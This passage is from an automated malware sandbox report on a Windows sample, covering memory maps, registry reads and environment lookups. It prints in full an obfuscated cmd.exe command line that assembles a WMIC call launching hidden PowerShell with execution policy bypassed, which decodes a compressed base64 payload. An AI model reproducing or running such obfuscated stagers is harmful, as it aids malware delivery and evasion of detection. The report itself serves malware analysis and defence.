- |
| browser.dll | 0x7fef6300000 | 0x7fef6324fff | Memory Mapped File | rwx |
|
|
|
- |
| srvsvc.dll | 0x7fef6330000 | 0x7fef636cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fef6370000 | 0x7fef6396fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fef63a0000 | 0x7fef6481fff | Memory Mapped File | rwx |
|
|
|
- |
| wdscore.dll | 0x7fef64d0000 | 0x7fef6516fff | Memory Mapped File | rwx |
|
|
|
- |
| sqmapi.dll | 0x7fef6520000 | 0x7fef6561fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x7fef6570000 | 0x7fef6580fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpsvc.dll | 0x7fef6590000 | 0x7fef6621fff | Memory Mapped File | rwx |
|
|
|
- |
| vsstrace.dll | 0x7fef73c0000 | 0x7fef73d6fff | Memory Mapped File | rwx |
|
|
|
- |
| vssapi.dll | 0x7fef73e0000 | 0x7fef758ffff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef8120000 | 0x7fef8128fff | Memory Mapped File | rwx |
|
|
|
- |
| rascfg.dll | 0x7fef8940000 | 0x7fef8959fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7fef8f60000 | 0x7fef904dfff | Memory Mapped File | rwx |
|
|
|
- |
| ndiscapcfg.dll | 0x7fef9340000 | 0x7fef934efff | Memory Mapped File | rwx |
|
|
|
- |
| bitsperf.dll | 0x7fef9350000 | 0x7fef9359fff | Memory Mapped File | rwx |
|
|
|
- |
| taskcomp.dll | 0x7fef93c0000 | 0x7fef9436fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| schedsvc.dll | 0x7fef9450000 | 0x7fef9561fff | Memory Mapped File | rwx |
|
|
|
- |
| wiarpc.dll | 0x7fef9570000 | 0x7fef957efff | Memory Mapped File | rwx |
|
|
|
- |
| fvecerts.dll | 0x7fef9580000 | 0x7fef9588fff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7fef9590000 | 0x7fef9598fff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7fef95a0000 | 0x7fef95f5fff | Memory Mapped File | rwx |
|
|
|
- |
| shsvcs.dll | 0x7fef9600000 | 0x7fef965dfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7fef9660000 | 0x7fef9677fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7fef9680000 | 0x7fef9690fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7fef96b0000 | 0x7fef9702fff | Memory Mapped File | rwx |
|
|
|
- |
| sens.dll | 0x7fefb650000 | 0x7fefb663fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 217 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #4: cmd.exe
338
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | CmD , , /V:On ,,/R " , (Se^T j1=^Ew-obje^ct I^o.c^OMp)& (^sET ^ ^J^F^O6=G^('VZBba8^IwGIb/^SpA^O^E^remtR5^Aix)&& (^s^e^t c^WSV=^A^rm^U)&& (Se^T ^ ^BW7=^XV)&( ,, , ,, (^SEt ^ C^ij=^vQN) , ,, )& (Set q^X=^i^I^))&&( , (^set ^ 8^i47=^ ^{`$_), ,, )&&(^s^Et ^ ^c^wH=^kqa02Wx^1/v^fFwy52+7z^fe^+)&& (^SEt ^q0^C^c=^9)&& (SE^T ^ ^OZ=.Co^MpR^ES)&( , , , ,, (s^E^T ^ ^ ^U19=e^a) , , )&( , (set ^8R=O) , )&&( ,(SE^T ^ ^xm=^h) )&& ( , (^s^e^t v^F=^s ^h^i^dDe), )& (S^e^t ^ep3A=^Q^OyR2U^JM)&(, ,, ,,(Se^T G1^yS=^4^oTe1Nn) , )&( (s^Et ^ r^Y=uqSZ^q^t^H7Njw) , )&( , , ,(S^E^T ^a^z8=N.^D^efLa^tesTR) , )& (^SET ^ b^1=^M^()&& (s^eT ^ D^RKS=FI^l^E^ -NoL^ogO )&& (^s^eT q^G=.^I)&& (^S^ET ^Rw=2ZZ^2)&& (S^Et G^Y=CA^C0g^IO)& ( (S^ET ^ e5^S=^`^$P^S^HO^ME[30]+'x'^)""^\"" ), , , )& (^se^t b^aCI=4k^Bwy)&& (,, , (sE^T ^ ^LK=f^R^o^m^ba), )&&(sE^t ^lPo=^([C^hAr]44^).T^oSTRIng)&& (, (s^Et Op^1=4) , )&&(se^T ^ ^E^f=a^f^tO^sH0^5)&(SE^T LI=foRE^ach^-)&&(^SeT ^ ^dv=D)&( , (Se^T ^ ^6rH^Y=^5+8) , ,, , , )&&( , , , (^Se^T ^ dn=Y/D^6) , )&& (^SE^T ^Vp^05=n^oPR)&& (, (^set ^AN=[s^ysTe^m.I^O.ME), ,,, , )&& ( ,(s^E^T ^ ^G5Q1=-^wINDO^w), )&( , ,, (s^ET 7z=o^CESs^ ) , )& (^SeT bO^q=^o^.stReAMRE^ADeR)&& ( , (Se^T ^DG=s^uB4) ,)&&( , (sE^t LI^j=^dap^D0) , )& (SE^t a^Xch=Ho^M^e)&& (S^Et ^ ^Z13= ""\""^(n)&&(, (s^ET e^q=^7) , , , )&& ( , (s^et eZ^P=o) , )&&( , (s^ET DQ=sHO^M^e) ,,, ,, )&& (s^ET ^ r^M=W^M^IC.)& ( (^SET uq^LY=]::^d^EC), , , )&& ( (s^ET ^ l^6e=b^1) , )&& (sE^t P^d^J6=[^2^1]^+$Ps)&&( ,(^SET ^ ^3B=0^dG^IO^e) ,, , , , )&& (^S^Et ^ Zz^t=g^klAj)&& (^sEt s^O= ^'CA^ll'^ ^'cRe^Ate^' ""^po)& (^SeT ^ q^2=0v^5W)&&(^se^T ^ ^A2=Ea^cH-^obj)&& ( ,(^SE^t ^ Co^Jf=^e) ,,,)&(^sEt ^ ^e^yWN=j^D8h)&&( ,(s^ET ^ ^z^RJ=^K5) , , )&& (^SeT J^6=^Fjr^iXLMf5)& ( , (s^ET ^ J^Z=1^z) ,, ,, , )&& (,(S^eT ^M^t=/D^+iA1Um^k6y^RKXmH) ,)&&( , ,,, , (^sEt 3^M^K^1=obj^ECt{nE^w^-o^bj^e), )& (se^T g^BQ=s^i)& (^seT ^ ^aMG=^u)& ( , ,, (^sE^T ^ ^aw^yI=^l) , )&( , (Se^t ^ ^ir^1^V=^h) )& (, , ,(S^Et uU^H=n^ ^ ^^^&^ ^(^ ), )&& ( , (S^Et o^JV=^^^|^ fOR),)&& (^S^e^t v^Z^c=$^p^S)&& (s^et ^ ^g^Vkp=^6)& ( , (SE^T ^CY=^4) , )&& (S^et 9c^u^B=^ )&& (se^t ^ ^Rz=^SS )&& (s^et ^ z^R=^G4G^u^tW)&&( , (se^T ^ gx^b=b^Yp) ,)& ( , (SE^t ^ ^a^g=z^P), )&&(, , , , , (S^eT sZ^G=Nt^Er^ac ^-), )& ( , (^sEt l^V^p=^OmPre^S^s^ ^)^ ) ,)& ( ,(^S^ET x^dNR=bg8^r^j), )&(,(s^E^T ^ l^R=^Ext^.eNcO) ,)&& (se^T ^ c^g=W^e^r^SH^e^ll^ -N^O)&& (^s^ET ^ OE^9^Q=DS^hyxy^yV2Apb^uy)&& ( (sET ^ Sq^5^s=Mo^RY^S^T^RE^a^m] ^[C^On^vER), )&& ( , (s^ET x^S=^re^ss^i), )& (S^eT p^v=^) "")&& ( , , , , ,(Se^t ^ I^G4^Q=^CT), )&&( , (S^ET ^ B^9s=^exe pR) ,)& (, (sE^T ^s^Hnp=0M^y), , , )&& (, (sE^T ^ ^Je=^m8) , )& (Se^t ^ bv=fa^qfNGZQobl^CJ^p)&&( , (se^T ^ q8=^v^v) , )&& (Se^T ^ ^S^l=Q^VH^cO8^e1hjBC^Xsd1^fexS2i)&& ( ,(s^ET ^ ^rj^UN=ni) , )& ( (SE^t ^H8^O=^QBL^9tiq^E^M^8^utN) ,, , )& (,(s^et bC^0=h^K) ,)&& ( , , ,, , (s^ET ^cI=^(^ ^`$^_""\"" ) , )&& (, ,, (^S^et ^ID=^21^]+), )&&(^sET ^ ^Dq4G=l^Ay^v^Y8Gg6lQqsD^4Yq^Rj^O)&& ( , (^SEt ^ Ea^u=S) , )&( ,(^s^Et ^Z^HTE=0^f), , , , , )&(^S^eT ^cN^Vz=^L1)& (^se^t ^oP8=p)& ( ,(^SeT ^ UQ7^k=^s^e64sTrIN), )&& (, , , , , (SE^T ^ ^7^2=^cP^V) , , , , ,)& (^SE^T ^cOyd=^RIng^(^) ^ )& (Se^T ^ X^j=+^ )&&( ,(S^eT ^Eh^p=^-ExEC^Ut ) , )& ( ,(^S^et ^h^g=+ ""\""[^sys^t^E^M^.^t), )& ( , (s^E^t ^ I1=W^A^Hn^u0^avhW^w^4c38X6) ,,, , ,)& (^seT ^ ^R5qC=^'^)^()& (, (SEt 3^C^he=^^^|) ,)&&(s^eT ^ HJ^VR=^ee57)&& (, (se^t ^ ^olr8=^}) , )& (,(S^Et ^I^r=^ON^.COmPR),)& (S^et ^3R^Y=^(^[ChA^r]44^))&(S^et cni^h=^E)&&(^s^eT 0^A=c^t S^Y^s^T^EM)&& (, (^Set ^ J^V^w=^od^E) , )&(^s^ET g^I=p^b^RXN^T^S)&& (^Set ^ us6=+00^z)& ( , , , (s^Et ^ C^d^J=A^p) ,)&& (SE^T bI^He=.T^oS^T)&(, (s^eT JG^A=T^]::), )&&(se^T ^ L^b=ho^M^E[34]+)&& ^sEt p^VZ=""&(, (^seT ^ ^6vzH=a) , )&( , (S^eT ^u5=^E3Kyvr^/E) ,)&&( ,(^seT ^rp=^iN^G]::^aS^C), , , )& ( ,(Set m^Lwq=U^5^EyC^8^='^)""\"" + ), , , )&& (S^ET ^ ^bn=^)^ ^+ ""\""^[^IO)&( ,(S^eT ^ c^LM=M9^ArXoE^w),)& (Se^T ^ G^U=^^^|^ )&& (S^et ^ b^HT=[)&( , (s^Et c2^Q=.rE^ad^Toen^d^(^) }^)) ,, ,)&( ,(se^t ^i8T3=^(),)&& (sE^T ^0zSA=B0/^W^9pYXW^t^tmz3U^fr^So^a)&&( , , , (sE^t ^ Eh=Z^ttA), ,, ,, )& (^S^eT ^ ^ ^VDG=N^M)&(, (Se^T ^ D^vI=ES^sI^o) )&& ( (Se^t O^c^W^L= ^^^&^(^ ^`$),)&& (, , , , ,(SE^T 3^y=I^hv) , )&(^Set q^Xu=3^D^J^dlB6l^MtdrCqa^KOl0P)& (, ,,,,(^se^T ^ ^ ^Zb='^X) , , )&& , ca^LL ,, SeT q4j=%r^M%%B^9s%%7z%%s^O%%c^g%%^rj^UN%%sZ^G%%^Vp^05%%^8R%%D^RKS%%^Eh^p%%gx^b%%^6vzH%%^Rz%%9c^u^B%%^G5Q1%%v^F%%uU^H%%v^Z^c%%a^Xch%%P^d^J6%%L^b%%^Zb%%^R5qC%%^Z13%%j1%%x^S%%eZ^P%%^a^z8%%^U19%%b^1%%^AN%%Sq^5^s%%JG^A%%^LK%%UQ7^k%%^J^F^O6%%bv%%us6%%^c^wH%%c^WSV%%C^d^J%%G^Y%%^q0^C^c%%^e^yWN%%^Z^HTE%%G1^yS%%^ep3A%%^ir^1^V%%l^6e%%Zz^t%%^BW7%%LI^j%%^aMG%%I1%%J^6%%^cN^Vz%%C^ij%%b^aCI%%OE^9^Q%%J^Z%%^DG%%q^Xu%%^E^f%%x^dNR%%g^I%%3^y%%^S^l%%dn%%^7^2%%^H8^O%%q8%%^u5%%^s^Hnp%%^aw^yI%%c^LM%%^0zSA%%Op^1%%^Dq4G%%^Rw%%r^Y%%^z^RJ%%^g^Vkp%%bC^0%%^3B%%^a^g%%^6rH^Y%%^CY%%^M^t%%Ea^u%%Eh%%e^q%%^Je%%q^2%%^xm%%Co^Jf%%z^R%%HJ^VR |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xadc |
| Parent PID | 0xac0 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x006f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x01fd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01fe0000 | 0x022aefff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49d50000 | 0x49da8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee6880000 | 0x7fee6887fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xae4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49d50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-01 09:27:43 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 136282 |
|
1 |
Environment (299)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = r^M |
|
1 | |
| Get Environment String | name = B^9s |
|
1 | |
| Get Environment String | name = 7z |
|
1 | |
| Get Environment String | name = s^O |
|
1 | |
| Get Environment String | name = c^g |
|
1 | |
| Get Environment String | name = ^rj^UN |
|
1 | |
| Get Environment String | name = sZ^G |
|
1 | |
| Get Environment String | name = ^Vp^05 |
|
1 | |
| Get Environment String | name = ^8R |
|
1 | |
| Get Environment String | name = D^RKS |
|
1 | |
| Get Environment String | name = ^Eh^p |
|
1 | |
| Get Environment String | name = gx^b |
|
1 | |
| Get Environment String | name = ^6vzH |
|
1 | |
| Get Environment String | name = ^Rz |
|
1 | |
| Get Environment String | name = 9c^u^B |
|
1 | |
| Get Environment String | name = ^G5Q1 |
|
1 | |
| Get Environment String | name = v^F |
|
1 | |
| Get Environment String | name = uU^H |
|
1 | |
| Get Environment String | name = v^Z^c |
|
1 | |
| Get Environment String | name = a^Xch |
|
1 | |
| Get Environment String | name = P^d^J6 |
|
1 | |
| Get Environment String | name = L^b |
|
1 | |
| Get Environment String | name = ^Zb |
|
1 | |
| Get Environment String | name = ^R5qC |
|
1 | |
| Get Environment String | name = ^Z13 |
|
1 | |
| Get Environment String | name = j1 |
|
1 | |
| Get Environment String | name = x^S |
|
1 | |
| Get Environment String | name = eZ^P |
|
1 | |
| Get Environment String | name = ^a^z8 |
|
1 | |
| Get Environment String | name = ^U19 |
|
1 | |
| Get Environment String | name = b^1 |
|
1 | |
| Get Environment String | name = ^AN |
|
1 | |
| Get Environment String | name = Sq^5^s |
|
1 | |
| Get Environment String | name = JG^A |
|
1 | |
| Get Environment String | name = ^LK |
|
1 | |
| Get Environment String | name = UQ7^k |
|
1 | |
| Get Environment String | name = ^J^F^O6 |
|
1 | |
| Get Environment String | name = bv |
|
1 | |
| Get Environment String | name = us6 |
|
1 | |
| Get Environment String | name = ^c^wH |
|
1 | |
| Get Environment String | name = c^WSV |
|
1 | |
| Get Environment String | name = C^d^J |
|
1 | |
| Get Environment String | name = G^Y |
|
1 | |
| Get Environment String | name = ^q0^C^c |
|
1 | |
| Get Environment String | name = ^e^yWN |
|
1 | |
| Get Environment String | name = ^Z^HTE |
|
1 | |
| Get Environment String | name = G1^yS |
|
1 | |
| Get Environment String | name = ^ep3A |
|
1 | |
| Get Environment String | name = ^ir^1^V |
|
1 | |
| Get Environment String | name = l^6e |
|
1 | |
| Get Environment String | name = Zz^t |
|
1 | |
| Get Environment String | name = ^BW7 |
|
1 | |
| Get Environment String | name = LI^j |
|
1 | |
| Get Environment String | name = ^aMG |
|
1 | |
| Get Environment String | name = I1 |
|
1 | |
| Get Environment String | name = J^6 |
|
1 | |
| Get Environment String | name = ^cN^Vz |
|
1 | |
| Get Environment String | name = C^ij |
|
1 | |
| Get Environment String | name = b^aCI |
|
1 | |
| Get Environment String | name = OE^9^Q |
|
1 | |
| Get Environment String | name = J^Z |
|
1 | |
| Get Environment String | name = ^DG |
|
1 | |
| Get Environment String | name = q^Xu |
|
1 | |
| Get Environment String | name = ^E^f |
|
1 | |
| Get Environment String | name = x^dNR |
|
1 | |
| Get Environment String | name = g^I |
|
1 | |
| Get Environment String | name = 3^y |
|
1 | |
| Get Environment String | name = ^S^l |
|
1 | |
| Get Environment String | name = dn |
|
1 | |
| Get Environment String | name = ^7^2 |
|
1 | |
| Get Environment String | name = ^H8^O |
|
1 | |
| Get Environment String | name = q8 |
|
1 | |
| Get Environment String | name = ^u5 |
|
1 | |
| Get Environment String | name = ^s^Hnp |
|
1 | |
| Get Environment String | name = ^aw^yI |
|
1 | |
| Get Environment String | name = c^LM |
|
1 | |
| Get Environment String | name = ^0zSA |
|
1 | |
| Get Environment String | name = Op^1 |
|
1 | |
| Get Environment String | name = ^Dq4G |
|
1 | |
| Get Environment String | name = ^Rw |
|
1 | |
| Get Environment String | name = r^Y |
|
1 | |
| Get Environment String | name = ^z^RJ |
|
1 | |
| Get Environment String | name = ^g^Vkp |
|
1 | |
| Get Environment String | name = bC^0 |
|
1 | |
| Get Environment String | name = ^3B |
|
1 | |
| Get Environment String | name = ^a^g |
|
1 | |
| Get Environment String | name = ^6rH^Y |
|
1 | |
| Get Environment String | name = ^CY |
|
1 | |
| Get Environment String | name = ^M^t |
|
1 | |
| Get Environment String | name = Ea^u |
|
1 | |
| Get Environment String | name = Eh |
|
1 | |
| Get Environment String | name = e^q |
|
1 | |
| Get Environment String | name = ^Je |
|
1 | |
| Get Environment String | name = q^2 |
|
1 | |
| Get Environment String | name = ^xm |
|
1 | |
| Get Environment String | name = Co^Jf |
|
1 | |
| Get Environment String | name = z^R |
|
1 | |
| Get Environment String | name = HJ^VR |
|
1 | |
| Get Environment String | name = m^Lwq |
|
1 | |
| Get Environment String | name = ^lPo |
|
1 | |
| Get Environment String | name = ^i8T3 |
|
1 | |
| Get Environment String | name = ^bn |
|
1 | |
| Get Environment String | name = ^OZ |
|
1 | |
| Get Environment String | name = g^BQ |
|
1 | |
| Get Environment String | name = ^I^r |
|
1 | |
| Get Environment String | name = D^vI |
|
1 | |
| Get Environment String | name = ^VDG |
|
1 | |
| Get Environment String | name = J^V^w |
|
1 | |
| Get Environment String | name = uq^LY |
|
1 | |
| Get Environment String | name = l^V^p |
|
1 | |
| Get Environment String | name = G^U |
|
1 | |
| Get Environment String | name = LI |
|
1 | |
| Get Environment String | name = 3^M^K^1 |
|
1 | |
| Get Environment String | name = 0^A |
|
1 | |
| Get Environment String | name = q^G |
|
1 | |
| Get Environment String | name = bO^q |
|
1 | |
| Get Environment String | name = ^cI |
|
1 | |
| Get Environment String | name = X^j |
|
1 | |
| Get Environment String | name = ^3R^Y |
|
1 | |
| Get Environment String | name = bI^He |
|
1 | |
| Get Environment String | name = ^cOyd |
|
1 | |
| Get Environment String | name = ^h^g |
|
1 | |
| Get Environment String | name = l^R |
|
1 | |
| Get Environment String | name = ^dv |
|
1 | |
| Get Environment String | name = ^rp |
|
1 | |
| Get Environment String | name = q^X |
|
1 | |
| Get Environment String | name = ^olr8 |
|
1 | |
| Get Environment String | name = o^JV |
|
1 | |
| Get Environment String | name = ^A2 |
|
1 | |
| Get Environment String | name = cni^h |
|
1 | |
| Get Environment String | name = I^G4^Q |
|
1 | |
| Get Environment String | name = 8^i47 |
|
1 | |
| Get Environment String | name = c2^Q |
|
1 | |
| Get Environment String | name = 3^C^he |
|
1 | |
| Get Environment String | name = O^c^W^L |
|
1 | |
| Get Environment String | name = ^oP8 |
|
1 | |
| Get Environment String | name = DQ |
|
1 | |
| Get Environment String | name = b^HT |
|
1 | |
| Get Environment String | name = ^ID |
|
1 | |
| Get Environment String | name = e5^S |
|
1 | |
| Get Environment String | name = p^v |
|
1 | |
| Get Environment String | name = & ,, ^cmd, , /r , |
|
1 | |
| Get Environment String | name = q4j^ |
|
1 | |
| Get Environment String | name = rM, result_out = WMIC. |
|
1 | |
| Get Environment String | name = B9s, result_out = exe pR |
|
1 | |
| Get Environment String | name = 7z, result_out = oCESs |
|
1 | |
| Get Environment String | name = sO, result_out = 'CAll' 'cReAte' ""po |
|
1 | |
| Get Environment String | name = cg, result_out = WerSHell -NO |
|
1 | |
| Get Environment String | name = rjUN, result_out = ni |
|
1 | |
| Get Environment String | name = sZG, result_out = NtErac - |
|
1 | |
| Get Environment String | name = Vp05, result_out = noPR |
|
1 | |
| Get Environment String | name = 8R, result_out = O |
|
1 | |
| Get Environment String | name = DRKS, result_out = FIlE -NoLogO |
|
1 | |
| Get Environment String | name = Ehp, result_out = -ExECUt |
|
1 | |
| Get Environment String | name = gxb, result_out = bYp |
|
1 | |
| Get Environment String | name = 6vzH, result_out = a |
|
1 | |
| Get Environment String | name = Rz, result_out = SS |
|
1 | |
| Get Environment String | name = 9cuB, result_out = |
|
1 | |
| Get Environment String | name = G5Q1, result_out = -wINDOw |
|
